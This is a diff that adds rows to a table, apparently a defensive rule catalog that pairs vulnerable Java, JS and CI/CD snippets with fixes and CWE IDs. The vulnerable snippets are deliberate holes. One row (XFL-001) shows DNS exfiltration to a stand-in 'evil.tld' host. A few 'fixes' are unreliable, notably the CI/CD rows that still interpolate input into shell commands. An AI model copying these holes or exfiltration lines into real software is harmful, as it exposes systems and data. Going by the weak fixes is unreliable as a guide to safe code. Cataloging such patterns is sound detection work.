+| SC-016 | Supply Chain: transitive dependency conflict resolved with forced older vulnerable version | `resolutionStrategy.force("x:y:1.0.0")` | `resolutionStrategy.force("x:y:1.2.9")` | Java Supply Chain Integrity | CWE-1104 |
+| SC-017 | Supply Chain: Maven repositories include local file path from untrusted env | `<url>file://${env.REPO_PATH}</url>` | `<url>https://trusted.repo/internal</url>` | Java Supply Chain Integrity | CWE-494 |
+| SC-018 | Supply Chain: Gradle init script downloads plugin from arbitrary URL | `apply from: "https://raw.tld/init.gradle"` | `apply from: "${rootDir}/gradle/init.gradle"` | Java Supply Chain Integrity | CWE-494 |
+| SC-019 | Supply Chain: custom serializer accepts negative enum ordinals | `state = State.values()[in.readInt()];` | `state = safeEnum(State.class, in.readInt());` | Java Serialization Safety | CWE-129 |
+| SC-020 | Supply Chain: custom serializer trusts serialized map size from untrusted stream | `for(int i=0;i<in.readInt();i++) map.put(...);` | `int sz=requireRange(in.readInt(),0,MAX_ENTRIES); for(int i=0;i<sz;i++) map.put(...);` | Java Serialization Safety | CWE-770 |
+| SC-021 | Supply Chain: custom serializer allows arbitrary object graph depth | `node.readExternal(in);` | `node.readExternal(in, depthLimit);` | Java Serialization Safety | CWE-674 |
+| SC-022 | Supply Chain: build uses `mavenLocal()` before trusted repos | `repositories { mavenLocal(); mavenCentral(); }` | `repositories { mavenCentral(); }` | Java Supply Chain Integrity | CWE-494 |
+| SC-023 | Supply Chain: dependency verification metadata not enabled in Gradle | `dependencyVerification { } // empty` | `dependencyVerification { verifyMetadata = true; verifySignatures = true }` | Java Supply Chain Integrity | CWE-353 |
+| SC-024 | Supply Chain: repository URL built from user-controlled system property | `url = uri(System.getProperty("repo.url"))` | `url = uri(allowlistedRepo(System.getProperty("repo.key")))` | Java Supply Chain Integrity | CWE-494 |
+| SC-025 | Supply Chain: externalizable stream format version not validated | `int v = in.readInt(); // ignored` | `int v = in.readInt(); requireSupportedVersion(v);` | Java Serialization Safety | CWE-345 |
+| TIM-001 | Timing side-channel (Logic: strong): HMAC/tag verified with `String.equals` | `if (expected.equals(computed)) return true;` | `if (MessageDigest.isEqual(expected.getBytes(UTF_8), computed.getBytes(UTF_8))) return true;` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-002 | Timing side-channel (Logic: strong): API key compared with `equals` | `if (apiKey.equals(headerKey)) allow();` | `if (MessageDigest.isEqual(apiKey.getBytes(UTF_8), headerKey.getBytes(UTF_8))) allow();` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-003 | Timing side-channel (Logic: strong): session token compared with `==` on strings | `if (sessionId == token) ok();` | `if (MessageDigest.isEqual(sessionId.getBytes(UTF_8), token.getBytes(UTF_8))) ok();` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-004 | Timing side-channel (Logic: strong): password hash compared with `equals` | `if (storedHash.equals(inputHash))` | `if (MessageDigest.isEqual(hex(storedHash), hex(inputHash)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-005 | Timing side-channel (Logic: strong): CSRF token short-circuit compare | `if (!token.equals(expected)) throw ...` | `if (!MessageDigest.isEqual(tokenBytes(token), tokenBytes(expected))) throw ...` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-006 | Timing side-channel (Logic: strong): OAuth state parameter `equals` | `if (!state.equals(expectedState))` | `if (!constantTimeEquals(state, expectedState))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-007 | Timing side-channel (Logic: strong): JWT signature bytes compared as strings | `if (!sig.equals(expectedSig))` | `if (!MessageDigest.isEqual(Base64.decode(sig), Base64.decode(expectedSig)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-008 | Timing side-channel (Logic: strong): mTLS client cert thumbprint `equals` | `if (!thumb.equals(expected))` | `if (!MessageDigest.isEqual(hex(thumb), hex(expected)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-009 | Timing side-channel (Logic: strong): TOTP code compared with `equals` | `if (code.equals(expectedTotp))` | `if (MessageDigest.isEqual(code.getBytes(UTF_8), expectedTotp.getBytes(UTF_8)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-010 | Timing side-channel (Logic: strong): webhook HMAC header vs secret with `equals` | `if (!sig.equals(hmac(payload, secret)))` | `if (!MessageDigest.isEqual(sig.getBytes(UTF_8), hmacBytes(payload, secret)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-011 | Timing side-channel (Logic: strong): early return on first mismatch in loop over secret | `for (int i=0;i<a.length();i++) if (a.charAt(i)!=b.charAt(i)) return false; return true;` | `return MessageDigest.isEqual(a.getBytes(UTF_8), b.getBytes(UTF_8));` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-012 | Timing side-channel (Logic: strong): `Arrays.equals` on derived secrets without constant-time primitive | `if (Arrays.equals(a, b))` | `if (MessageDigest.isEqual(a, b))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-013 | Timing side-channel (Logic: strong): `String.contentEquals` on bearer token | `if (token.contentEquals(expected))` | `if (MessageDigest.isEqual(token.getBytes(UTF_8), expected.getBytes(UTF_8)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-014 | Timing side-channel (Logic: strong): `String.regionMatches` for MAC | `a.regionMatches(0, b, 0, len)` | `MessageDigest.isEqual(slice(a), slice(b))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| TIM-015 | Timing side-channel (Logic: strong): `Objects.equals` on sensitive strings | `if (Objects.equals(secret, guess))` | `if (MessageDigest.isEqual(secret.getBytes(UTF_8), guess.getBytes(UTF_8)))` | Java Crypto Timing (Logic: strong) | CWE-208 |
+| DEX-001 | Dynamic execution (Logic: strong): `ScriptEngine.eval` with user input | `engine.eval(userScript);` | `engine.eval(sandboxedScript(allowlistAst(userScript)));` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-002 | Dynamic execution (Logic: strong): `GroovyShell.parse` from request | `new GroovyShell().parse(req.getBody());` | `new GroovyShell(sandboxConfig).parse(allowlistedScript(req.getBody()));` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-003 | Dynamic execution (Logic: strong): `GroovyShell.evaluate` with concatenated input | `shell.evaluate("return " + expr);` | `shell.evaluate(compileExprFromAst(safeAst(expr)));` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-004 | Dynamic execution (Logic: strong): `Class.forName` from user-controlled name | `Class.forName(req.getParameter("class"));` | `Class.forName(allowlistedClass(req.getParameter("class")));` | Java Dynamic Execution (Logic: strong) | CWE-470 |
+| DEX-005 | Dynamic execution (Logic: strong): `ClassLoader.loadClass` from external input | `cl.loadClass(userClass);` | `cl.loadClass(allowlistedClass(userClass));` | Java Dynamic Execution (Logic: strong) | CWE-470 |
+| DEX-006 | Dynamic execution (Logic: strong): `Method.invoke` on method name from user | `m.getClass().getMethod(name).invoke(m, args);` | `invokeAllowlisted(m, name, args);` | Java Dynamic Execution (Logic: strong) | CWE-470 |
+| DEX-007 | Dynamic execution (Logic: strong): `Constructor.newInstance` from reflected class | `c.newInstance();` where `c` from stream | `instantiateAllowlisted(c, registry);` | Java Dynamic Execution (Logic: strong) | CWE-502 |
+| DEX-008 | Dynamic execution (Logic: strong): Nashorn/GraalJS `eval` on user string | `context.eval("js", userJs);` | `context.eval("js", wrappedInSandbox(userJs));` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-009 | Dynamic execution (Logic: strong): BeanShell `Interpreter.eval` | `new Interpreter().eval(userExpr);` | `new Interpreter().eval(safeExpr(userExpr));` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-010 | Dynamic execution (Logic: strong): JEXL `JexlEngine.createExpression` from user | `jexl.createExpression(userExpr).evaluate(ctx);` | `jexl.createExpression(allowlistedExpr(userExpr)).evaluate(sandboxCtx);` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-011 | Dynamic execution (Logic: strong): MVEL `MVEL.eval` on untrusted | `MVEL.eval(userInput);` | `MVEL.eval(safeCompiled(userInput), sandbox);` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-012 | Dynamic execution (Logic: strong): SpEL `parser.parseExpression` from user | `parser.parseExpression(user).getValue(ctx);` | `parser.parseExpression(allowlistedSpel(user)).getValue(sandboxCtx);` | Java Dynamic Execution (Logic: strong) | CWE-94 |
+| DEX-013 | Dynamic execution (Logic: strong): `URLClassLoader` with user URL | `new URLClassLoader(new URL[]{new URL(userUrl)});` | `new URLClassLoader(trustedUrlsOnly(userUrl));` | Java Dynamic Execution (Logic: strong) | CWE-494 |
+| DEX-014 | Dynamic execution (Logic: strong): `ServiceLoader.load` with user-provided SPI name | `ServiceLoader.load(Class.forName(name));` | `ServiceLoader.load(allowlistedSpi(name));` | Java Dynamic Execution (Logic: strong) | CWE-470 |
+| DEX-015 | Dynamic execution (Logic: strong): `Unsafe.allocateInstance` or reflective bypass | `unsafe.allocateInstance(clazz);` | `forbidUnsafe(); useFactory(allowlistedTypes);` | Java Dynamic Execution (Logic: strong) | CWE-470 |
+| XFL-001 | Covert channel: DNS subdomain encodes exfil chunk in lookup | `InetAddress.getByName(chunk + ".evil.tld");` | `blockDnsExfil(); resolveOnlyAllowlistedHosts();` | Java APT / Exfiltration | CWE-1053 |
+| XFL-002 | Covert channel: sequential DNS queries in loop with user data | `for (String p : parts) InetAddress.getByName(p + ".tld");` | `denyArbitraryDns(); useInternalResolver();` | Java APT / Exfiltration | CWE-1053 |
+| XFL-003 | Covert channel: ICMP raw socket or ping payload from secrets | `ping.send(secret.getBytes());` | `stripRawIcmp(); noSecretsInProbePayload();` | Java APT / Exfiltration | CWE-1053 |
+| XFL-004 | Covert channel: custom HTTP header carries base64 blob outbound | `headers.set("X-Debug", Base64.encode(secret));` | `headers.remove("X-Debug"); auditOutboundHeaders();` | Java APT / Exfiltration | CWE-200 |
+| XFL-005 | Covert channel: `User-Agent` concatenated with internal token | `ua = req.getHeader("UA") + token;` | `ua = sanitizeUa(req.getHeader("UA"));` | Java APT / Exfiltration | CWE-200 |
+| XFL-006 | Covert channel: `Referer` or `X-Forwarded-For` echoes DB row | `resp.setHeader("X-Trace", row.toString());` | `resp.setHeader("X-Request-Id", opaqueId());` | Java APT / Exfiltration | CWE-200 |
+| XFL-007 | Covert channel: WebSocket text frame sends PII to external host | `session.sendMessage(new TextMessage(pii));` | `session.sendMessage(new TextMessage(redact(pii)));` | Java APT / Exfiltration | CWE-359 |
+| XFL-008 | Covert channel: SMTP `Bcc` or `Reply-To` set from user for blind forward | `mime.setReplyTo(userAddr);` | `mime.setReplyTo(trustedNoReply());` | Java APT / Exfiltration | CWE-441 |
+| XFL-009 | Covert channel: JDBC URL parameters smuggle data to logger | `jdbcUrl += "&trace=" + Base64.encode(secret);` | `jdbcUrl = sanitizeJdbcParams(jdbcUrl);` | Java APT / Exfiltration | CWE-532 |
+| XFL-010 | Covert channel: DNS TXT query built from clipboard/session dump | `resolver.lookup(txtFrom(session));` | `blockTxtQueries(); allowDnsPolicy();` | Java APT / Exfiltration | CWE-1053 |
+| RLP-001 | Un-terminable loop risk: `@Transactional` while queue without timeout | `while(true){ process(queue.take()); }` | `while (!Thread.interrupted()) { if (!queue.poll(timeout, unit, this::process)) break; }` | Java Transaction Reliability | CWE-835 |
+| RLP-002 | Un-terminable loop risk: nested transaction retry without cap | `while(true){ try { tx(); break; } catch(Retryable e){} }` | `for (int i=0;i<maxRetries;i++) { try { tx(); break; } catch... }` | Java Transaction Reliability | CWE-835 |
+| RLP-003 | Un-terminable loop risk: `for(;;)` on stream without deadline | `for(;;) { readAndCommit(); }` | `for (Instant d=deadline(); Instant.now().isBefore(d);) readAndCommit();` | Java Transaction Reliability | CWE-835 |
+| RLP-004 | Un-terminable loop risk: payment batch while true without circuit breaker | `while(true) paymentQueue.process();` | `while (circuit.allow() && paymentQueue.processOnce()) ;` | Java Transaction Reliability | CWE-835 |
+| RLP-005 | Un-terminable loop risk: spin-wait on flag inside transaction | `while(!ready) { /* spin */ }` | `ready.await(timeout, unit);` | Java Transaction Reliability | CWE-1299 |
+| RLP-006 | Un-terminable loop risk: `while(rs.next())` without fetch size on huge result | `while(rs.next()) tx.update(rs);` | `stmt.setFetchSize(500); boundedCursor(rs, maxRows);` | Java Transaction Reliability | CWE-770 |
+| RLP-007 | Un-terminable loop risk: recursive call in `@Transactional` without depth | `self.process(child);` unbounded | `processWithDepth(child, depth+1, maxDepth);` | Java Transaction Reliability | CWE-674 |
+| RLP-008 | Un-terminable loop risk: event consumer `while(true)` in same TX as DB | `@Transactional while(true) consume();` | `@Transactional void batchOnce(); @Scheduled void loop();` | Java Transaction Reliability | CWE-1108 |
+| RLP-009 | Un-terminable loop risk: lock acquisition without timeout in TX | `lock.lock();` | `if (!lock.tryLock(timeout, unit)) rollback();` | Java Transaction Reliability | CWE-1299 |
+| RLP-010 | Un-terminable loop risk: `CompletableFuture` join inside TX without overall timeout | `f.join();` in long TX | `f.orTimeout(ms, MILLISECONDS).join();` | Java Transaction Reliability | CWE-1053 |
+| RED-001 | ReDoS: nested quantifiers in Java `Pattern` from user input | `Pattern.compile("(a+)+b");` | `Pattern.compile(safeRe2j(userPat), RE2_FLAGS);` | Java/JS Regex Safety | CWE-1333 |
+| RED-002 | ReDoS: overlapping alternation `(a | a)*` style in validator | `Pattern.compile("(a | a)+");` | `Pattern.compile(rewrittenLinearPattern(p));` | Java/JS Regex Safety | CWE-1333 |
+| RED-003 | ReDoS: unbounded nested groups `(.*)*` on HTTP path | `path.matches("(.*)*$");` | `path.matches(safeBoundedPathRegex());` | Java/JS Regex Safety | CWE-1333 |
+| RED-004 | ReDoS: catastrophic backtracking `([a-zA-Z]+)*` on email field | `email.matches("([a-zA-Z]+)*@...");` | `useParsedEmailValidator(email);` | Java/JS Regex Safety | CWE-1333 |
+| RED-005 | ReDoS: nested `+` inside optional `(a+)+?` misuse | `Pattern.compile("(a+)+?b");` | `Pattern.compile(linearTokenPattern());` | Java/JS Regex Safety | CWE-1333 |
+| RED-006 | ReDoS: Java `String.replaceAll` with user regex | `s.replaceAll(userRegex, "");` | `s.replaceAll(safeRe2j(userRegex), "");` | Java/JS Regex Safety | CWE-1333 |
+| RED-007 | ReDoS: `Matcher.matches` on long string with evil pattern | `m.matches();` after `Pattern.compile(userPat)` | `boundedMatch(userPat, s, maxSteps);` | Java/JS Regex Safety | CWE-1333 |
+| RED-008 | ReDoS: JS `new RegExp` from API with nested `+` | ``new RegExp(`^(${u})+`)`` | `new RE2(safePattern(u));` | Java/JS Regex Safety | CWE-1333 |
+| RED-009 | ReDoS: JS `String.match` with user-controlled alternation tree | `str.match(new RegExp(user));` | `str.match(safeCompiled(user));` | Java/JS Regex Safety | CWE-1333 |
+| RED-010 | ReDoS: possessive/lazy mix without timeout in validation service | `Pattern.compile("(a+)+c").matcher(s).find();` | `findWithTimeout(p, s, 50, MILLISECONDS);` | Java/JS Regex Safety | CWE-1333 |
+| RED-011 | ReDoS: JSON schema `pattern` with nested quantifiers | `"pattern": "(a+)+b"` | `"pattern": "^[a-z]{1,32}$"` | Java/JS Regex Safety | CWE-1333 |
+| RED-012 | ReDoS: log line sanitizer regex from config unbounded | `Pattern.compile(cfg.getSanitizer());` | `Pattern.compile(validateRe2(cfg.getSanitizer()));` | Java/JS Regex Safety | CWE-1333 |
+| RED-013 | ReDoS: `split` with user delimiter regex | `s.split(userDelim);` | `s.split(Pattern.quote(userDelim));` | Java/JS Regex Safety | CWE-1333 |
+| RED-014 | ReDoS: multiple quantifiers on overlapping charset `[\w\s]*[\w\s]*` | `Pattern.compile("[\\w\\s]*[\\w\\s]*");` | `Pattern.compile("\\w{0,200}");` | Java/JS Regex Safety | CWE-1333 |
+| RED-015 | ReDoS: `Pattern.compile` without length guard before `find` | `p.matcher(veryLong).find();` | `if (veryLong.length() > maxLen) reject(); p.matcher(veryLong).find();` | Java/JS Regex Safety | CWE-1333 |
+| CIC-001 | CI/CD: GitHub Actions `run` interpolates `github.event.inputs` into shell | `run: echo ${{ github.event.inputs.cmd }}` | `run: echo "${{ github.event.inputs.cmd }}"` + `script: validateInput()` / use `env` with strict allowlist | Java CI/CD Safety | CWE-94 |
+| CIC-002 | CI/CD: `run: ${{ inputs.command }}` direct execution | `run: ${{ inputs.command }}` | `run: ./scripts/allowlisted.sh "${{ inputs.command }}"` | Java CI/CD Safety | CWE-94 |
+| CIC-003 | CI/CD: GitLab CI `script` with unsanitized `$CI_MERGE_REQUEST_TITLE` | `script: echo $CI_MERGE_REQUEST_TITLE` | `script: python -c "import os,shlex; print(shlex.quote(os.environ['CI_MERGE_REQUEST_TITLE']))"` | Java CI/CD Safety | CWE-94 |
+| CIC-004 | CI/CD: GitLab `rules:if` with user-controlled variable in shell | `rules: - if: '$VAR == "true"'` | Pin `rules` to protected branch variables only | Java CI/CD Safety | CWE-94 |
+| CIC-005 | CI/CD: `curl` URL from `github.event.comment.body` | `curl ${{ github.event.comment.body }}` | `curl "$(allowlistedUrl '${{ github.event.comment.body }}')"` | Java CI/CD Safety | CWE-918 |
+| CIC-006 | CI/CD: `docker run` with `secrets` from fork PR | `docker run -e KEY=${{ secrets.API_KEY }}` on `pull_request` | Restrict to `pull_request_target` + approval gate or deny secrets on fork | Java CI/CD Safety | CWE-200 |
+| CIC-007 | CI/CD: `GITHUB_TOKEN` with `permissions: write-all` | `permissions: write-all` | `permissions: contents: read` | Java CI/CD Safety | CWE-250 |
+| CIC-008 | CI/CD: `actions/checkout` without `persist-credentials: false` on untrusted | `uses: actions/checkout@v4` | `uses: actions/checkout@v4` with `persist-credentials: false` | Java CI/CD Safety | CWE-522 |
+| CIC-009 | CI/CD: `eval` of matrix value in bash | `run: eval "${{ matrix.script }}"` | `run: ./run-matrix.sh "${{ matrix.name }}"` | Java CI/CD Safety | CWE-94 |
+| CIC-010 | CI/CD: `npm exec` / `npx` with package from `github.event.inputs` | `run: npx ${{ inputs.pkg }}` | `run: npx "$(npm view --json ${{ inputs.pkg }} | jq -r .name)"` + allowlist | Java CI/CD Safety | CWE-829 |
+| EXP-001 | Exposure: Spring `management.endpoints.web.exposure.include=*` in prod | `management.endpoints.web.exposure.include=*` | `management.endpoints.web.exposure.include=health,info`<br>`management.endpoint.health.show-details=never` | Java Spring Exposure | CWE-200 |
+| EXP-002 | Exposure: `management.server.port` exposed on public interface | `management.server.address=0.0.0.0` | `management.server.address=127.0.0.1` | Java Spring Exposure | CWE-200 |
+| EXP-003 | Exposure: Spring Boot H2 console enabled | `spring.h2.console.enabled=true` | `spring.h2.console.enabled=false` | Java Spring Exposure | CWE-200 |
+| EXP-004 | Exposure: H2 console path on default with weak security | `spring.h2.console.path=/h2-console` | Disable console or bind admin-only + mTLS | Java Spring Exposure | CWE-284 |
+| EXP-005 | Exposure: `springdoc.swagger-ui.enabled=true` in prod profile | `springdoc.swagger-ui.enabled=true` | `springdoc.swagger-ui.enabled=false` | Java Spring Exposure | CWE-200 |
+| EXP-006 | Exposure: `springfox.documentation.enabled=true` without auth | `springfox.documentation.enabled=true` | `springfox.documentation.enabled=false` + gateway-only docs | Java Spring Exposure | CWE-284 |
+| EXP-007 | Exposure: `management.endpoints.enabled-by-default=true` | `management.endpoints.enabled-by-default=true` | `management.endpoints.enabled-by-default=false` + explicit allowlist | Java Spring Exposure | CWE-200 |
+| EXP-008 | Exposure: `management.endpoint.env.show-values=ALWAYS` | `management.endpoint.env.show-values=ALWAYS` | `management.endpoint.env.show-values=NEVER` | Java Spring Exposure | CWE-200 |
+| EXP-009 | Exposure: `management.endpoint.httptrace.enabled=true` publicly | `management.endpoint.httptrace.enabled=true` | `management.endpoint.httptrace.enabled=false` | Java Spring Exposure | CWE-359 |
+| EXP-010 | Exposure: `debug=true` in production `application-prod` | `debug=true` | `debug=false` | Java Spring Exposure | CWE-489 |
+| RAC-001 | TOCTOU (Logic: strong): `file.exists()` check before delete | `if (f.exists()) f.delete();` | `Files.deleteIfExists(path);` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-002 | TOCTOU (Logic: strong): check-then-create temp file without atomic create | `if (!f.exists()) f.createNewFile();` | `Files.createFile(path); // handle FileAlreadyExistsException` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-003 | TOCTOU (Logic: strong): canonical path check then separate open | `if (safe(p)) new FileInputStream(p);` | `try (var ch = FileChannel.open(validatedPath, NOFOLLOW_LINKS)) { ... }` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-004 | TOCTOU (Logic: strong): symlink race via `Files.isRegularFile` before read | `if (Files.isRegularFile(p)) Files.readString(p);` | `readWithNoFollowAndInodeLock(p);` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-005 | TOCTOU (Logic: strong): non-atomic balance update from shared state | `if (bal>=amt) bal-=amt;` | `atomicBalance.updateAndGet(v -> v>=amt ? v-amt : v);` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-006 | TOCTOU (Logic: strong): increment sequence in Redis without transaction | `long n = get(k); set(k,n+1);` | `INCR k` or `WATCH/MULTI/EXEC` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-007 | TOCTOU (Logic: strong): double-spend check outside DB lock | `if (!paid(id)) markPaid(id);` | `SELECT ... FOR UPDATE` + single transactional update | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-008 | TOCTOU (Logic: strong): map contains-check then put on shared map | `if(!m.containsKey(k)) m.put(k,v);` | `m.computeIfAbsent(k, kk -> v);` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-009 | TOCTOU (Logic: strong): cache check then DB write without compare-and-set | `if(cache.get(k)==null){db.save();cache.set(k,v);}` | `cache.setIfAbsent(k,v)` + idempotency key | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-010 | TOCTOU (Logic: strong): filesystem permission check before execute | `if (f.canExecute()) Runtime.exec(f);` | `executeOnlyAllowlistedBinary(path)` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-011 | TOCTOU (Logic: strong): lock-free shared counter in multithreaded auth limiter | `attempts++;` | `AtomicInteger attempts = new AtomicInteger(); attempts.incrementAndGet();` | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-012 | TOCTOU (Logic: strong): uniqueness check then insert without unique constraint | `if(repo.findByEmail(e)==null) repo.save(u);` | DB unique index + handle duplicate-key exception | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-013 | TOCTOU (Logic: strong): stale read then permission decision | `if (roleRepo.get(u)==ADMIN) action();` | `action()` inside fresh transaction and lock | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-014 | TOCTOU (Logic: strong): read-modify-write JSON config file concurrently | `cfg=read(); cfg.x=y; write(cfg);` | file lock + atomic temp-file replace | Java Race Conditions (Logic: strong) | CWE-367 |
+| RAC-015 | TOCTOU (Logic: strong): two-step token invalidation race | `if(valid(t)) blacklist.add(t);` | atomic `SETNX`/single state transition in DB | Java Race Conditions (Logic: strong) | CWE-367 |
+| CAC-001 | Cache Security: `@Cacheable` returns full user object including secrets | `@Cacheable("users") User find(...)` | cache `UserPublicDto` only, exclude password/PII fields | Java Cache Security | CWE-1275 |
+| CAC-002 | Cache Security: plaintext API tokens stored in Redis | `redis.set("tok:"+id, token)` | `redis.set(key, encrypt(token))` + key rotation | Java Cache Security | CWE-1275 |
+| CAC-003 | Cache Security: plaintext session payload in Memcached | `memcached.set(k, ttl, sessionJson)` | `memcached.set(k, ttl, encryptAndSign(sessionJson))` | Java Cache Security | CWE-1275 |
+| CAC-004 | Cache Security: `@CachePut` on entity with SSN/PII fields | `@CachePut Employee save(...)` | cache sanitized projection only | Java Cache Security | CWE-1275 |
+| CAC-005 | Cache Security: cache key includes PII (email/phone) | `key = "u:"+email` | `key = "u:"+hash(email)` | Java Cache Security | CWE-359 |
+| CAC-006 | Cache Security: long TTL for sensitive auth artifacts | `cache.set(k, 86400, otp)` | `cache.set(k, 60, otpRef)` | Java Cache Security | CWE-1275 |
+| CAC-007 | Cache Security: shared cache namespace without tenant scoping | `cache.get("profile:"+id)` | `cache.get("tenant:"+tid+":profile:"+id)` | Java Cache Security | CWE-668 |
+| CAC-008 | Cache Security: no integrity protection for cached security decisions | `cache.set("acl:"+u, decision)` | `cache.set("acl:"+u, sign(decision))` | Java Cache Security | CWE-353 |
+| CAC-009 | Cache Security: storing private keys in cache | `cache.set("pk:"+id, privateKeyPem)` | store key refs in HSM/KMS; never cache key material | Java Cache Security | CWE-1275 |
+| CAC-010 | Cache Security: debug endpoint dumps entire cache values | `return redis.keys("*").map(redis::get)` | disable value dump; expose only metrics | Java Cache Security | CWE-200 |
+| CAC-011 | Cache Security: serializing full OAuth principal into cache | `cache.set(k, principal)` | `cache.set(k, principalIdAndScopes)` | Java Cache Security | CWE-1275 |
+| CAC-012 | Cache Security: unencrypted local in-memory cache persisted to disk | `diskStorePath=/tmp/cache` | encrypted cache store + restricted path | Java Cache Security | CWE-312 |
+| CAC-013 | Cache Security: cache warmup loads secrets into broad keyspace | `cache.putAll(secretMap)` | cache only non-sensitive derived values | Java Cache Security | CWE-1275 |
+| CAC-014 | Cache Security: missing cache eviction on credential rotation | `rotateKey();` | `rotateKey(); cache.evict(userKeyRef);` | Java Cache Security | CWE-613 |
+| CAC-015 | Cache Security: cache deserialization without type restrictions | `Object v = serializer.deserialize(b)` | deserialize allowlisted DTO types only | Java Cache Security | CWE-502 |
+| ENV-001 | Environmental Trust: unvalidated `PATH` used to execute binary | `Runtime.exec(System.getenv("PATH")+cmd)` | execute absolute allowlisted binary path only | Java Env Trust | CWE-1384 |
+| ENV-002 | Environmental Trust: honoring `LD_PRELOAD` from process env | `pb.environment().put("LD_PRELOAD", userVal)` | clear dangerous env vars before exec | Java Env Trust | CWE-1384 |
+| ENV-003 | Environmental Trust: command resolution relies on inherited PATH order | `new ProcessBuilder("tar", "xf", f)` | `new ProcessBuilder("/usr/bin/tar", "xf", f)` | Java Env Trust | CWE-1384 |
+| ENV-004 | Environmental Trust: hardcoded writable system path for executable load | `new File("/tmp/tools/helper")` | use immutable, root-owned application path | Java Env Trust | CWE-427 |
+| ENV-005 | Environmental Trust: trusting `JAVA_TOOL_OPTIONS` at runtime | `opts = System.getenv("JAVA_TOOL_OPTIONS")` | ignore external tool options in prod | Java Env Trust | CWE-1384 |
+| ENV-006 | Environmental Trust: using `PYTHONPATH`/`CLASSPATH` from untrusted env for subprocess | `env.put("CLASSPATH", userCp)` | set fixed classpath from trusted config | Java Env Trust | CWE-1384 |
+| ENV-007 | Environmental Trust: loading native library from env-controlled directory | `System.load(System.getenv("LIBDIR")+"/x.so")` | load from signed fixed library directory | Java Env Trust | CWE-427 |
+| ENV-008 | Environmental Trust: executable lookup through relative path | `Runtime.exec("./bin/worker")` | resolve to canonical trusted absolute path | Java Env Trust | CWE-426 |
+| ENV-009 | Environmental Trust: startup scripts inherit shell aliases/functions | `bash -lc "tool ..."` | invoke binary directly without shell expansion | Java Env Trust | CWE-78 |
+| ENV-010 | Environmental Trust: trusting `HOME` for security policy file location | `readPolicy(System.getenv("HOME")+"/.policy")` | read policy from immutable system config dir | Java Env Trust | CWE-1384 |
+| LGC-001 | Logic side-channel: auth returns "User found" vs "Invalid credentials" | `return "User found";` | return generic auth error for all failures | Java Logic Side-channel | CWE-203 |
+| LGC-002 | Logic side-channel: password reset reveals unknown email | `return "Email not found"` | `return "If account exists, email sent"` | Java Logic Side-channel | CWE-203 |
+| LGC-003 | Logic side-channel: file API returns distinct 403 vs 404 for hidden resources | `403 for private, 404 for missing` | normalize responses for unauthorized/missing | Java Logic Side-channel | CWE-203 |
+| LGC-004 | Logic side-channel: username availability endpoint leaks registered users | `return exists(username)` | rate-limit and return non-enumerable response | Java Logic Side-channel | CWE-203 |
+| LGC-005 | Logic side-channel: MFA endpoint discloses enrollment status | `return "MFA not configured"` | generic challenge response | Java Logic Side-channel | CWE-203 |
+| LGC-006 | Logic side-channel: account lock response differs for valid users | `return "Account locked"` | generic error with uniform status code | Java Logic Side-channel | CWE-203 |
+| LGC-007 | Logic side-channel: file upload returns parser stack only for existing tenants | `return ex.getMessage()` | uniform sanitized error envelope | Java Logic Side-channel | CWE-209 |
+| LGC-008 | Logic side-channel: profile API reveals disabled account state to strangers | `return "user disabled"` | return generic not-found style response | Java Logic Side-channel | CWE-203 |
+| LGC-009 | Logic side-channel: timing difference between user-not-found and bad-password branch | `if(!exists) return fastFail;` | constant-time auth path for both branches | Java Logic Side-channel | CWE-208 |
+| LGC-010 | Logic side-channel: admin file action returns detailed ownership mismatch | `return "owner mismatch: "+ownerId` | return generic access denied message | Java Logic Side-channel | CWE-203 |
+| SGA-001 | Saga drift (Logic: strong): local DB commit before remote reserve call | `repo.save(o); payment.reserve(o);` | orchestrate with outbox + compensating rollback on reserve failure | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-002 | Saga drift (Logic: strong): missing compensation for inventory step | `inventory.decrease(sku, qty);` | `try step; on failure -> inventory.compensate(sku, qty)` | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-003 | Saga drift (Logic: strong): no idempotency key on saga steps | `payment.capture(orderId)` | `payment.capture(orderId, sagaStepIdempotencyKey)` | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-004 | Saga drift (Logic: strong): compensator updates wrong aggregate version | `order.setStatus(CANCELLED); repo.save(order);` | lock/verify version before compensation update | Java Saga Security (Logic: strong) | CWE-367 |
+| SGA-005 | Saga drift (Logic: strong): partial state persisted when third-party timeout occurs | `repo.save(state); external.call();` | two-phase state with PENDING + timeout handler + compensation | Java Saga Security (Logic: strong) | CWE-1209 |
